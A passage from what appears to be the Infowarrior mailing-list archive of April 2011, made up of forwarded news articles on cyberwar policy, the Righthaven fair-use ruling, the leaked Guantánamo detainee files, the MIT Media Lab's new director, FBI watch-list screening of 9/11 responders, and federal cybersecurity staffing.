Members of the group famously testified before Congress in May 1998 that they would be able to take down the internet in 30 minutes using shortcomings of the BGP routing protocol that were endemic in international telecom networks at the time. Although that particular hole has long been plugged, it remains the case that critical infrastructure systems are wide open to attack, Wysopal told El Reg. "The only safe way is to air-gap critical infrastructure systems," he said, adding that removable media also posed a big threat from information leakage, as the WikiLeaks case illustrates. Wysopal agreed with Almann that most countries are developing offensive cyber-capabilities, even if they don't like to talk about it. "The equivalent of special forces units are building [cyberwar] tools. Meanwhile countries are training soldiers, the equivalent of infantry, to use those tools," Wysopal said, adding that he reckons any country with nukes is also likely to have offensive cyberwarfare capability. "Cyber-weapons can be used to amplify the effects of other attacks or carry out cyber-sabotage, like Stuxnet. It takes an army to carry out cyberwar because there are hundreds of targets." Attackers have a built-in advantage over cyber-defenders because of the "asymmetrical" nature of cyberwar, he concluded. "Defence needs to plug all the holes, while those on the offence only need to find one," he said. Links: 
[1] http://www.csmonitor.com/2007/0517/p99s01-duts.html From rforno at infowarrior.org Mon Apr 25 09:39:24 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 10:39:24 -0400 Subject: [Infowarrior] - Another Judge Slams Righthaven Message-ID: <532F6E88-F1C0-419E-8CAB-91EBA8645D64@infowarrior.org> Another Judge Slams Righthaven For Chilling Effects That Do Nothing To Advance Copyright Act's Purpose from the a-lesson-in-fair-use dept http://www.techdirt.com/articles/20110423/01033814013/another-judge-slams-righthaven-chilling-effects-that-do-nothing-to-advance-copyright-acts-purpose.shtml Back in March, Judge James Mahan had verbally stated that he intended to rule that the non-profit Center for Intercultural Organizing (CIO) was protected by fair use, in posting a full article from the Las Vegas Review-Journal. This was impressive, in part, because CIO hadn't even raised a fair use defense itself. Instead, the judge brought it up in the first place. Now the official ruling has come out, and it's a beauty. Not only does it go through why posting an entire article can still be fair use, but it slams Righthaven for its actions, noting how it has a "chilling effect" on speech, and its actions do not advance the Copyright Act's purpose. You can read the whole thing, but the conclusion summarizes it all nicely: The court finds that the defendant's use of the copyrighted article in this case constitutes fair use as a matter of law. The article has been removed from its original context; it is no longer owned by a newspaper; and it has been assigned to a company that uses the copyright exclusively to file infringement lawsuits. Plaintiff's litigation strategy has a chilling effect on potential fair uses of Righthaven-owned articles, diminishes public access to the facts contained therein, and does nothing to advance the Copyright Act's purpose of promoting artistic creation. Bam. 
It's really great to see one judge after another condemning Righthaven, and showing that its business model strategy of using the courts to pressure people to settle isn't fooling anyone. Separately, I did want to dig in a bit on the fact that CIO used the entire article and yet it was still deemed fair use. Some people assume that if you use the entire work, it can never be fair use. We've certainly pointed to plenty of exceptions to this claim in the past, but the judge's discussion on this particular fact is quite interesting and worth reading: Here, the court finds that, although the defendants posted the work in its entirety, the amount used was reasonable in light of the purpose of the use, which was to educate the public about immigration issues. Because of the factual nature of the work, and to give the full flavor of the information, the defendants used the entire article rather than trying to distill it. The court finds that it would have been impracticable for defendants to cut out portions or edit the article down. See e.g., Campbell, 510 U.S. at 588-89 (noting that for a parody to be effective, it must take enough material to evoke the original). This is really great, and hopefully similar thinking will find its way to other courts as well. "The amount used was reasonable in light of the purpose of the use." I'll have to remember that line the next time someone insists there's no fair use if you use the whole thing. From rforno at infowarrior.org Mon Apr 25 17:09:01 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 18:09:01 -0400 Subject: [Infowarrior] - Classified Files Offer New Insights Into Detainees Message-ID: <893DF24B-246A-42ED-9474-F806DBA7FDB1@infowarrior.org> April 24, 2011 Classified Files Offer New Insights Into Detainees http://www.nytimes.com/2011/04/25/world/guantanamo-files-lives-in-an-american-limbo.html By CHARLIE SAVAGE, WILLIAM GLABERSON and ANDREW W. LEHREN WASHINGTON - 
A trove of more than 700 classified military documents provides new and detailed accounts of the men who have done time at the Guantánamo Bay prison in Cuba, and offers new insight into the evidence against the 172 men still locked up there. Military intelligence officials, in assessments of detainees written between February 2002 and January 2009, evaluated their histories and provided glimpses of the tensions between captors and captives. What began as a jury-rigged experiment after the 2001 terrorist attacks now seems like an enduring American institution, and the leaked files show why, by laying bare the patchwork and contradictory evidence that in many cases would never have stood up in criminal court or a military tribunal. The documents meticulously record the detainees' "pocket litter" when they were captured: a bus ticket to Kabul, a fake passport and forged student ID, a restaurant receipt, even a poem. They list the prisoners' illnesses: hepatitis, gout, tuberculosis, depression. They note their serial interrogations, enumerating (even after six or more years of relentless questioning) remaining "areas of potential exploitation." They describe inmates' infractions: punching guards, tearing apart shower shoes, shouting across cellblocks. And, as analysts try to bolster the case for continued incarceration, they record years of detainees' comments about one another. The secret documents, made available to The New York Times and several other news organizations, reveal that most of the 172 remaining prisoners have been rated as a "high risk" of posing a threat to the United States and its allies if released without adequate rehabilitation and supervision. But they also show that an even larger number of the prisoners who have left Cuba (about a third of the 600 already transferred to other countries) were also designated "high risk" before they were freed or passed to the custody of other governments. 
The documents are largely silent about the use of the harsh interrogation tactics at Guantánamo (including sleep deprivation, shackling in stress positions and prolonged exposure to cold temperatures) that drew global condemnation. Several prisoners, though, are portrayed as making up false stories about being subjected to abuse. The government's basic allegations against many detainees have long been public, and have often been challenged by prisoners and their lawyers. But the dossiers, prepared under the Bush administration, provide a deeper look at the frightening, if flawed, intelligence that has persuaded the Obama administration, too, that the prison cannot readily be closed. Prisoners who especially worried counterterrorism officials included some accused of being assassins for Al Qaeda, operatives for a canceled suicide mission and detainees who vowed to their interrogators that they would wreak revenge against America. The military analysts' files provide new details about the most infamous of their prisoners, Khalid Shaikh Mohammed, the planner of the Sept. 11, 2001, attacks. Sometime around March 2002, he ordered a former Baltimore resident to don a suicide bomb vest and carry out a "martyrdom" attack against Pervez Musharraf, then Pakistan's president, according to the documents. But when the man, Majid Khan, got to the Pakistani mosque that he had been told Mr. Musharraf would visit, the assignment turned out to be just a test of his "willingness to die for the cause." The dossiers also show the seat-of-the-pants intelligence gathering in war zones that led to the incarcerations of innocent men for years in cases of mistaken identity or simple misfortune. In May 2003, for example, Afghan forces captured Prisoner 1051, an Afghan named Sharbat, near the scene of a roadside bomb explosion, the documents show. He denied any involvement, saying he was a shepherd. 
Guantánamo debriefers and analysts agreed, citing his consistent story, his knowledge of herding animals and his ignorance of "simple military and political concepts," according to his assessment. Yet a military tribunal declared him an "enemy combatant" anyway, and he was not sent home until 2006. Obama administration officials condemned the publication of the classified documents, which were obtained by the anti-secrecy group WikiLeaks last year but provided to The Times by another source. The officials pointed out that an administration task force set up in January 2009 reviewed the information in the prisoner assessments, and in some cases came to different conclusions. Thus, they said, the documents published by The Times may not represent the government's current view of detainees at Guantánamo. Among the findings in the files:
The 20th hijacker: The best-documented case of an abusive interrogation at Guantánamo was the coercive questioning, in late 2002 and early 2003, of Mohammed Qahtani. A Saudi believed to have been an intended participant in the Sept. 11 attacks, Mr. Qahtani was leashed like a dog, sexually humiliated and forced to urinate on himself. His file says, "Although publicly released records allege detainee was subject to harsh interrogation techniques in the early stages of detention," his confessions "appear to be true and are corroborated in reporting from other sources." But claims that he is said to have made about at least 16 other prisoners (mostly in April and May 2003) are cited in their files without any caveat.
Threats against captors: While some detainees are described in the documents as "mostly compliant and rarely hostile to guard force and staff," others spoke of violence. One detainee said "he would like to tell his friends in Iraq to find the interrogator, slice him up, and make a shwarma (a type of sandwich) out of him, with the interrogator's head sticking out of the end of the shwarma." 
Another "threatened to kill a U.S. service member by chopping off his head and hands when he gets out," and informed a guard that "he will murder him and drink his blood for lunch. Detainee also stated he would fly planes into houses and prayed that President Bush would die."

- The role of foreign officials: The leaked documents show how many foreign countries sent intelligence officers to question Guantánamo detainees — among them China, Russia, Tajikistan, Yemen, Saudi Arabia, Jordan, Kuwait, Algeria and Tunisia. One such visit changed a detainee's account: a Saudi prisoner initially told American interrogators he had traveled to Afghanistan to train at a Libyan-run terrorist training camp. But an analyst added: "Detainee changed his story to a less incriminating one after the Saudi Delegation came and spoke to the detainees."

- A Qaeda leader's reputation: The file for Abd al-Rahim al-Nashiri, who was charged before a military commission last week for plotting the bombing of the American destroyer Cole in 2000, says he was "more senior" in Al Qaeda than Khalid Shaikh Mohammed, and describes him as "so dedicated to jihad that he reportedly received injections to promote impotence and recommended the injections to others so more time could be spent on the jihad (rather than being distracted by women)."

- The Yemenis' hard luck: The files for dozens of the remaining prisoners portray them as low-level foot-soldiers who traveled from Yemen to Afghanistan before the Sept. 11 attacks to receive basic military training and fight in the civil war there, not as global terrorists. Otherwise identical detainees from other countries were sent home many years ago, the files show, but the Yemenis remain at Guantánamo because of concerns over the stability of their country and its ability to monitor them.

- Dubious information: Some assessments revealed the risk of relying on information supplied by people whose motives were murky.
Hajji Jalil, then a 33-year-old Afghan, was captured in July 2003, after the Afghan chief of intelligence in Helmand Province said Mr. Jalil had taken an "active part" in an ambush that killed two American soldiers. But American officials, citing "fraudulent circumstances," said later that the intelligence chief and others had participated in the ambush, and they had "targeted" Mr. Jalil "to provide cover for their own involvement." He was sent home in March 2005.

- A British agent: One report reveals that American officials discovered a detainee had been recruited by British and Canadian intelligence to work as an agent because of his "connections to members of various Al-Qaeda-linked terrorist groups." But the report suggests that he had never shifted his militant loyalties. It says that the Central Intelligence Agency, after repeated interrogations of the detainee, concluded that he had "withheld important information" from the British and Canadians, and assessed him "to be a threat" to American and allied personnel in Afghanistan and Pakistan. He has since been sent back to his country.

- A journalist's interrogation: The documents show that a major reason a Sudanese cameraman for Al Jazeera, Sami al-Hajj, was held at Guantánamo for six years was for questioning about the television network's "training program, telecommunications equipment, and newsgathering operations in Chechnya, Kosovo, and Afghanistan," including contacts with terrorist groups. While Mr. Hajj insisted he was just a journalist, his file says he helped Islamic extremist groups courier money and obtain Stinger missiles and cites the United Arab Emirates' claim that he was a Qaeda member. He was released in 2008 and returned to work for Al Jazeera.

- The first to leave: The documents offer the first public look at the military's views of 158 detainees who did not receive a formal hearing under a system instituted in 2004. Many were assessed to be "of little intelligence value"
with no ties to or significant knowledge about Al Qaeda or the Taliban, as was the case of a detainee who was an Afghan used car salesman. But also among those freed early was a Pakistani who would become a suicide attacker three years later. Many of the dossiers include official close-up photographs of the detainees, providing images of hundreds of the prisoners, many of whom have not been seen publicly in years. The files — classified "secret" and marked "noforn," meaning they should not be shared with foreign governments — represent the fourth major collection of secret American documents that have become public over the past year; earlier releases included military incident reports from the wars in Afghanistan and Iraq and portions of an archive of some 250,000 diplomatic cables. Military prosecutors have accused an Army intelligence analyst, Pfc. Bradley Manning, of leaking the materials. The Guantánamo assessments seem unlikely to end the long-running debate about America's most controversial prison. The documents can be mined for evidence supporting beliefs across the political spectrum about the relative perils posed by the detainees and whether the government's system of holding most without trials is justified. Much of the information in the documents is impossible to verify. The documents were prepared by intelligence and military officials operating at first in the haze of war, then, as the years passed, in a prison under international criticism. In some cases, judges have rejected the government's allegations, because confessions were made during coercive interrogation or other sources were not credible. In 2009, a task force of officials from the government's national security agencies re-evaluated all 240 detainees then remaining at the prison. They vetted the military's assessments against information held by other agencies, and dropped the "high/medium/low"
risk ratings in favor of a more nuanced look at how each detainee might fare if released, in light of his specific family and national environment. But those newer assessments are still secret and not available for comparison. Moreover, the leaked archive is not complete; it contains no assessments for about 75 of the detainees. Yet for all the limitations of the files, they still offer an extraordinary look inside a prison that has long been known for its secrecy and for a struggle between the military that runs it — using constant surveillance, forced removal from cells and other tools to exert control — and detainees who often fought back with the limited tools available to them: hunger strikes, threats of retribution and hoarded contraband ranging from a metal screw to leftover food. Scores of detainees were given disciplinary citations for "inappropriate use of bodily fluids," as some files delicately say; other files make clear that detainees on a fairly regular basis were accused by guards of throwing urine and feces. No new prisoners have been transferred to Guantánamo since 2007. Some Republicans are urging the Obama administration to send newly captured terrorism suspects to the prison, but so far officials have refused to increase the inmate population. As a result, Guantánamo seems increasingly frozen in time, with detainees locked into their roles at the receding moment of their capture. For example, an assessment of a former top Taliban official said he "appears to be resentful of being apprehended while he claimed he was working for the US and Coalition forces to find Mullah Omar," a reference to Mullah Muhammad Omar, the Taliban chief who is in hiding. But whatever the truth about the detainee's role before his capture in 2002, it is receding into the past. So, presumably, is the value of whatever information he possesses. Still, his jailers have continued to press him for answers. His assessment of January 2008 —
six years after he arrived in Cuba — contended that it was worthwhile to continue to interrogate him, in part because he might know about Mullah Omar's "possible whereabouts." Charlie Savage reported from Washington, and William Glaberson and Andrew W. Lehren from New York. Scott Shane contributed reporting from Washington, and Benjamin Weiser and Andrei Scheinkman from New York. From rforno at infowarrior.org Mon Apr 25 20:34:08 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 21:34:08 -0400 Subject: [Infowarrior] - M.I.T. Media Lab Names a New Director Message-ID: M.I.T. Media Lab Names a New Director By JOHN MARKOFF http://www.nytimes.com/2011/04/26/science/26lab.html?pagewanted=print For centuries diplomas have been synonymous with the nation's universities. That makes the Massachusetts Institute of Technology's decision to name a 44-year-old Japanese venture capitalist who attended, but did not graduate from, two American colleges as the director of one of the world's top computing science laboratories an unusual choice. On Tuesday, the university plans to announce that Joichi Ito, known as Joi, will become the fourth director of the M.I.T. Media Laboratory, which was originally founded by the architect Nicholas Negroponte in 1985 and has since become recognized for its willingness to take risks in developing technologies that are at the edge of the computing frontier. The Media Laboratory gained a global reputation during the 1990s as an avant-garde research center known for stunning high-technology demonstrations that pointed toward a future digital society. Indeed, the Media Lab has on occasion been criticized for overemphasizing flashy demos. During the 1990s, under Dr. Negroponte, the lab evolved a research culture of "demo or die," rather than the standard academic "publish or perish" model.
The Media Lab pioneered a range of computing-based technologies like the Aspen Movie Map, a forerunner of Google Street View; the $100 Laptop, an educational tool intended for students in the developing world; and E Ink, the display technology that makes an Amazon Kindle book reader viewable in bright sunlight. Perhaps its most important role, however, has been in helping to nurture a generation of innovative designers like John Underkoffler, a user-interface designer who is now a Hollywood consultant and who provided most of the futuristic interface ideas seen in the movie "Minority Report." In 1990, with American fears about Japan as a high-technology competitor running high, the Media Lab also briefly became a lightning rod for criticism after it struck a deal to transfer its research approach to Japanese industry and educational institutions. Although that adds a touch of irony to the decision to choose Mr. Ito, he is neither a conventional Japanese technologist nor your average college dropout. Raised in both Tokyo and Silicon Valley, Mr. Ito was part of the first generation to grow up with the Internet. His career includes serving as a board member of Icann, the Internet's governance organization; becoming a "guild master" in the World of Warcraft online fantasy game; and more than a dozen investments in start-ups like Flickr, Last.fm and Twitter. In 1994 he helped establish the first commercial Internet service provider in Japan. He was also an early participant in the open-source software movement and is a board member of the Mozilla Foundation, which oversees the development of the Firefox Web browser, as well as being the co-founder and chairman of Creative Commons, a nonprofit organization that has sought to create a middle ground to promote the sharing of digital information. "The choice is radical, but brilliant,"
said Larry Smarr, director of the California Institute for Telecommunications and Information Technology, a University of California laboratory that pursues a similar research agenda to the Media Laboratory. "He can position the lab at the edge of change and propel it for a decade." Mr. Ito's appointment comes at a time when the Media Lab, as well as other information technology research centers, have struggled to reclaim the financing levels that were characteristic of the era of the dot-com boom. Although the lab gets the bulk of its $35 million annual budget from corporate and government sponsors, that amount has declined measurably as a percentage of the overall budget during the last decade, Dr. Negroponte said. "Funding got tight in 2002 and even tighter in the last economic downturn," he said. That has made fund-raising the highest priority for the new director, he said. However, he added that Mr. Ito's particular leadership qualities made him stand out among the 250 candidates who were considered for the position. "Joi is very good at enabling others," he said. "I've never met a 44-year-old who is able to enable others in this way. Most people who are at that age are into themselves and their career." L. Rafael Reif, the provost of M.I.T., called Mr. Ito "the right person to lead the Media Lab today," describing him as "an innovative thinker who understands the tremendous potential of technology and, in particular, the Internet, to influence education, business, and society in general." Directing the Media Lab is an alluring challenge because of the potential of blending the longer term focus of university research and development efforts with the agility and risk-taking approach of Silicon Valley start-ups, Mr. Ito said. "You embrace serendipity and you pivot as you go along this longer term arc. That's the way I have lived my life. I've jumped around in terms of career and geography," he said. Mr.
Ito, who maintains a home outside of Tokyo, became a resident of Dubai at the end of 2008 to gain a better understanding of the Middle East. He said that was part of his desire to understand intellectual property issues internationally and to become what he described as a "global citizen." Even among the Internet generation, Mr. Ito has been extraordinary in the degree to which he has lived his life publicly and online in blog posts and on a dizzying array of social media. Last year he traveled about 230 days, and it is possible to follow his adventures on a Web site he maintains in text, images and video, including a diving trip this month that involved feeding sharks in the Caribbean. Mr. Ito first attended Tufts, where he briefly studied computer science but wrote that he found it drudge work. Later he attended the University of Chicago, where he studied physics, but once again found it stultifying. He later wrote of his experience: "I once asked a professor to explain the solution to a problem so I could understand it more intuitively. He said, 'You can't understand it intuitively. Just learn the formula so you'll get the right answer.' That was it for me." Mr. Ito's colleagues minimize the fact that he is without academic credentials. "He has credibility in an academic context," said Lawrence Lessig, a professor at Harvard Law School who co-founded Creative Commons. Mr. Ito is currently chairman. "We've been collaborators, and I've stolen many ideas from him and turned them into my own." The Media Lab will benefit from a director who has Mr. Ito's global connections, said John Seely Brown, former director of Xerox's Palo Alto Research Center. "What they really need right now is to have a two-way connection to the outside world. Who better to do that than Joi?"
From rforno at infowarrior.org Tue Apr 26 19:45:57 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 26 Apr 2011 20:45:57 -0400 Subject: [Infowarrior] - CRS Report Withheld By USTR Confirms That ACTA Language Is Quite Questionable Message-ID: CRS Report Withheld By USTR Confirms That ACTA Language Is Quite Questionable from the revealed dept We're happy to announce that we've been able to get our hands on the -- until now -- secret Congressional Research Service analysis of ACTA. You can see it embedded below, and it shows that the language used by the USTR in ACTA has lots of weasel words that let them claim it doesn't impact US law, but the interpretations of the language could very much impact US law. First some background.... < -- > http://www.techdirt.com/articles/20110421/16580813994/crs-report-withheld-ustr-confirms-that-acta-language-is-quite-questionable.shtml From rforno at infowarrior.org Wed Apr 27 06:16:35 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 27 Apr 2011 07:16:35 -0400 Subject: [Infowarrior] - 9/11 Responders To Be Warned They Will Be Screened By FBI's Terrorism Watch List Message-ID: 9/11 Responders To Be Warned They Will Be Screened By FBI's Terrorism Watch List (EXCLUSIVE) First Posted: 04/21/11 04:24 PM ET Updated: 04/21/11 10:56 PM ET http://www.huffingtonpost.com/2011/04/21/911-responders-screened-for-terror-ties_n_852198.html WASHINGTON -- A provision in the new 9/11 health bill may be adding insult to injury for people who fell sick after their service in the aftermath of the 2001 Al Qaeda attacks, The Huffington Post has learned. The tens of thousands of cops, firefighters, construction workers and others who survived the worst terrorist assault in U.S. history and risked their lives in its wake will soon be informed that their names must be run through the FBI's terrorism watch list, according to a letter obtained by HuffPost.
Any of the responders who are not compared to the database of suspected terrorists would be barred from getting treatment for the numerous, worsening ailments that the James Zadroga 9/11 Health And Compensation Law was passed to address. It's a requirement that was tacked onto the law during the bitter debates over it last year. The letter from Dr. John Howard, director of the National Institute for Occupational Safety and Health, informs medical providers and administrators that they should begin letting patients know before the new program kicks in this July. "This is absurd," said Glen Kline, a former NYPD emergency services officer. "It's silly. It's stupid. It's asinine." "It's comical at best, and I think it's an insult to everyone who worked on The Pile and is sick and suffering from 9/11," said John Feal, a former construction worker who lost half a foot at Ground Zero and runs the advocacy group Fealgood Foundation. The provision was added in an amendment by Rep. Cliff Stearns (R-Fla.) during the heated debate over the bill in the House Energy and Commerce Committee last May. Sept. 11 responders in the committee room at the time mostly shook their heads at the move, which Democrats accepted on a voice vote after battling to bar other amendments on abortion and immigration that might have killed the bill. But suddenly the point is no longer just a strategic concession to get a law passed. As doctors and administrators begin acting on the federal instructions, participants in the 9/11 treatment and monitoring programs will soon be told that their names, places of birth, addresses, government ID numbers and other personal data will be provided to the FBI to ensure they are not terrorists. Howard's instructions include a sample letter to responders designed to minimize alarm.
"Although neither we nor [the Centers for Disease Control]/NIOSH anticipate the name of any individual in the current Programs will be on the list, CDC/NIOSH is expressly required by law to implement this particular requirement of the Act," it says. "Thank you for your understanding. We look forward to working with you and ensuring that you continue to receive uninterrupted services under the new WTC Health Program," it concludes. Feal, who counts hundreds of first responders in his foundation's membership, predicted the letters would not go over well. "When cops and firefighters get this at home, they're going to hit the roof," he said. Kline, who sits on the Fealgood Foundation's board, said he personally wasn't offended, but couldn't think of a good reason for cops and firefighters to be screened by the FBI in order to keep getting treatment. "I mean, who are we even talking about -- the undocumented workers who cleaned the office buildings?" wondered Kline Thursday. "We know who all the cops, firefighters and construction workers were. They're all documented. "Is the idea that a terrorist stayed to help clean up? And then stayed all these years to try and get benefits?" he asked. "In all the things I've seen out of Washington, this probably takes the cake." Some are more understanding. "Do we want terrorists getting money? No," said Anthony Flammia, a former NYPD Highway Patrol officer and Sept. 11 responder. "How do you know if there were any terrorists there? Were they there as observers, watching? Probably." But he noted that his perspective likely would not be shared, especially if people whose names are similar to actual terror suspects get flagged, as happens with air travelers. "I've got nothing to hide, so it's no big deal for me, but there's got to be safeguards in place to protect the people who are innocent," Flammia said. "It's going to be controversial," he added. "It's probably going to create an uproar, but I think it will dissipate.
I hope they're ready to answer people's questions." Congressman Stearns said in a statement that his intent was to answer exactly the questions raised by Flammia. "This amendment was adopted in the full Energy and Commerce Committee without opposition and it merely requires that the names of those receiving health benefits be cross-checked with the terrorist watch list to ensure that no terrorists get these benefits," Stearns said. "These benefits are not just for our first responders; nearly anyone who was in the vicinity or worked on a cleanup crew afterward is eligible," he noted. The prohibition is included in two parts of the bill. One specifically covers responders, while the other deals with all survivors, including office workers, bystanders and residents. Feal acknowledged that the terrorist screening has to be done because it is the law, and that the letters have to go out. But he holds Stearns responsible, as well as several other Republicans who were hostile to the 9/11 bill, and tried to tack all manner of amendments onto it. "I think Congressman Stearns is stabbing at pettiness. He's a buffoon," Feal said. "We get sicker and die, and they're going to disseminate a letter wondering whether we're terrorists or not. ... I think everybody needs to start showing a little more compassion." From rforno at infowarrior.org Wed Apr 27 06:28:25 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 27 Apr 2011 07:28:25 -0400 Subject: [Infowarrior] - Government to Pull Plug on 137 Data Centers Message-ID: Government to Pull Plug on 137 Data Centers By DAMIAN PALETTA http://online.wsj.com/article/SB10001424052748704729304576287431386089352.html The Obama administration will unveil plans Wednesday to shut 137 of the 2,094 federal data centers by the end of the year, a move that officials see as a breakthrough in their effort to make the government's information-technology infrastructure more efficient and less costly.
The closures would affect 16 federal agencies, including the Pentagon and the State Department, in nearly every corner of the U.S., from Boston to Anchorage, Alaska, according to the White House plan. Administration officials said that they didn't have an estimate of how many government and contractor jobs might be cut as a result. The number of federal data centers has grown rapidly in recent decades, up from just 432 in 1998. But White House officials said many of the centers ran over budget and were underutilized. The Obama administration began planning to pare back data centers in February 2009, soon after President Barack Obama took office. The process proved complicated because it took months for officials to determine how many even existed. The plan aims to close a total of 800 centers by 2015, which officials project would save $3 billion annually. The proliferation of facilities was the target of a Government Accountability Office report in March, which described them as a prime example of duplication and overlap in federal bureaucracy. "Projects run over budget, they fall behind schedule, and they fail to deliver their promised functionality," said Jeffrey Zients, the White House's chief performance officer. "That's clearly unacceptable." Data centers facilitate computer processing; they can be used for data storage, networking or housing servers. White House officials believe the number of facilities, spread out across many different agencies, is inefficient. The government spends roughly $450 million on electricity for the centers, and White House officials estimate that 27% of a typical data center is utilized, far lower than averages for private-sector counterparts. Consolidating data centers is part of the White House's broader effort to reduce the growth of government and spending, something critics have said the administration hasn't moved quickly enough to address. 
The government spends roughly $80 billion a year on information technology, just a fraction of overall federal spending, but officials believe roughly $24 billion of that amount is spent on data centers and their operations. Many White House proposals to reduce the deficit, such as an overhaul of the tax code or eliminating certain Pentagon projects, require congressional approval. But the executive branch has more direct influence in the operations of federal agencies, making it easier to carry out the data-center consolidation. Still, such a move could face political resistance from lawmakers seeking to protect jobs at data centers in their districts. "We do expect, obviously, in the coming months and years to make some of those really tough decisions where we would have to work really close with Congress to shut down data centers that frankly don't make sense," said Vivek Kundra, the government's chief information officer. The administration has already shut 39 of them, with 98 more to be closed by year's end. Before the reductions began, the Pentagon had 772 data centers, far more than any other agency, according to the government. Of the total closures, 57 will be within the Defense Department, 18 in the Department of the Interior and 14 in the National Aeronautics and Space Administration. Write to Damian Paletta at damian.paletta at wsj.com From rforno at infowarrior.org Wed Apr 27 08:06:19 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 27 Apr 2011 09:06:19 -0400 Subject: [Infowarrior] - Petraeus and Panetta in Line for National Security Posts Message-ID: Petraeus and Panetta in Line for National Security Posts By ELISABETH BUMILLER and MARK MAZZETTI https://www.nytimes.com/2011/04/28/us/28team.html?pagewanted=print WASHINGTON — President Obama is expected this week to name Leon E. Panetta, the director of central intelligence, as defense secretary and Gen. David H.
Petraeus, the top American commander in Afghanistan, as director of the C.I.A., administration officials said Wednesday. The appointments, set in motion by the impending retirement of Defense Secretary Robert M. Gates, are part of a significant rearrangement of Mr. Obama's national security team that will include several new assignments within the closest circle of his diplomatic, military and intelligence advisors. Mr. Gates is expected to step down this summer. The changes at the top of Mr. Obama's national security team have long been expected. Not long after Mr. Gates leaves, the term will expire for the chairman of the Joint Chiefs of Staff, Adm. Mike Mullen, who, like the defense secretary, was appointed by President George W. Bush. And Deputy Secretary of State James B. Steinberg has announced that he is leaving for an academic job — removing one of the crucial players in Mr. Obama's efforts to manage China's rise. But Mr. Gates's role is the most critical. He often allied with Secretary of State Hillary Rodham Clinton — who has said that she intends to leave the administration when this term ends — including persuading Mr. Obama to start the military buildup in Afghanistan in 2009. Together they won many other battles, but they visibly split last month on the military intervention in Libya. In naming Mr. Panetta to the Pentagon, Mr. Obama is selecting an already confirmed cabinet official with strong ties to both the White House and Capitol Hill. In selecting General Petraeus, who at least initially did not have a strong relationship with the Obama White House, the president is retaining a high-profile military official who has extensive knowledge of intelligence gathering in both Afghanistan and Iraq in recent years.
From rforno at infowarrior.org Wed Apr 27 09:05:02 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 27 Apr 2011 10:05:02 -0400 Subject: [Infowarrior] - GMU Paper: The Dangers of Threat Inflation in Cybersecurity Policy Message-ID: <5AB93AB4-2F5E-4D30-B517-FF0F28AC4F20@infowarrior.org> Loving the Cyber Bomb? The Dangers of Threat Inflation in Cybersecurity Policy Jerry Brito, Tate Watkins | Apr 26, 2011 http://mercatus.org/publication/loving-cyber-bomb-dangers-threat-inflation-cybersecurity-policy Over the past two years there has been a steady drumbeat of alarmist rhetoric coming out of Washington about potential catastrophic cyber threats. For example, at a Senate Armed Services Committee hearing last year, Chairman Carl Levin said that "cyberweapons and cyberattacks potentially can be devastating, approaching weapons of mass destruction in their effects." Proposed responses include increased federal spending on cybersecurity and the regulation of private network security practices. The rhetoric of "cyber doom" employed by proponents of increased federal intervention, however, lacks clear evidence of a serious threat that can be verified by the public. As a result, the United States may be witnessing a bout of threat inflation similar to that seen in the run-up to the Iraq War. Additionally, a cyber-industrial complex is emerging, much like the military-industrial complex of the Cold War. This complex may serve to not only supply cybersecurity solutions to the federal government, but to drum up demand for them as well. Part I of this article draws a parallel between today's cybersecurity debate and the run-up to the Iraq War and looks at how an inflated public conception of the threat we face may lead to unnecessary regulation of the Internet.
Part II draws a parallel between the emerging cybersecurity establishment and the military-industrial complex of the Cold War and looks at how unwarranted external influence can lead to unnecessary federal spending. Finally, Part III surveys several federal cybersecurity proposals and presents a framework for analyzing the cybersecurity threat. < -- > http://mercatus.org/publication/loving-cyber-bomb-dangers-threat-inflation-cybersecurity-policy From rforno at infowarrior.org Thu Apr 28 06:01:08 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 28 Apr 2011 07:01:08 -0400 Subject: [Infowarrior] - Cyberespionage: US finds FBI agents in elite unit lack necessary skills Message-ID: <1E72B0AF-F4C1-4179-B32F-B88467EA5C17@infowarrior.org> The Christian Science Monitor - CSMonitor.com Cyberespionage: US finds FBI agents in elite unit lack necessary skills With US increasingly vulnerable to cyberespionage, a Justice Department report finds that many agents attached to the FBI's elite cyber unit lack the skills to investigate such cases. http://www.csmonitor.com/layout/set/print/content/view/print/380037 By Mark Clayton, Staff writer posted April 27, 2011 at 8:41 pm EDT Many of the Federal Bureau of Investigation's field agents assigned to an elite cyber investigative unit lack the skills needed to investigate cases of cyberespionage and other computerized attacks on the US, the Justice Department inspector general reported Wednesday. That's a problem because the US is under constant and increasing cyberattack with 5,499 known intrusions into US government computer systems in 2008 alone — a 40 percent jump from 2007, the inspector general's office found. Investigating these kinds of cyberespionage attacks falls largely on the FBI as the lead agency for the National Cyber Investigative Joint Task force, which also includes representatives from 18 different intelligence agencies and is assigned to investigate the most difficult national security intrusions —
those by a foreign power for intelligence gathering or terrorist purposes.

But in interviews with 36 field agents in 10 of the FBI's 56 field offices nationwide, 13 agents, or more than a third, "reported that they lacked the networking and counterintelligence expertise to investigate national security [computer] intrusion cases." Five of the agents told investigators "they did not think they were able or qualified" to investigate such cases, the report said.

The inspector general report does not indicate whether the 36 field agents who were interviewed are a representative sampling of the FBI's cyber unit. Still, having enough highly qualified digital experts defending US government and other computer systems is neither an unknown problem nor one exclusive to the FBI.

More experts are needed

"While billions of dollars are being spent on new technologies to secure the US government in cyberspace, it is the people with the right knowledge, skills, and abilities to implement those technologies who will determine success," the cyber education section of President Obama's Comprehensive National Cybersecurity Initiative found last year. "However there are not enough cybersecurity experts within the federal government or private sector" to secure the government. Existing training and education programs, it said, are "limited in focus and lack unity of effort." To ensure an adequate pipeline of skilled people "it will take a national strategy, similar to the effort to upgrade science and mathematics education in the 1950s, to meet this challenge."

Other cybersecurity experts have cited the same problem. "There are about 1,000 security people in the US who have the specialized security skills to operate at world-class levels in cyberspace - we need 10,000 to 30,000,"
Jim Gosler, founding director of the CIA's Clandestine Information Technology Office, was quoted as saying in a report last year by the Center for Strategic and International Studies in Washington.

Agent rotation is criticized

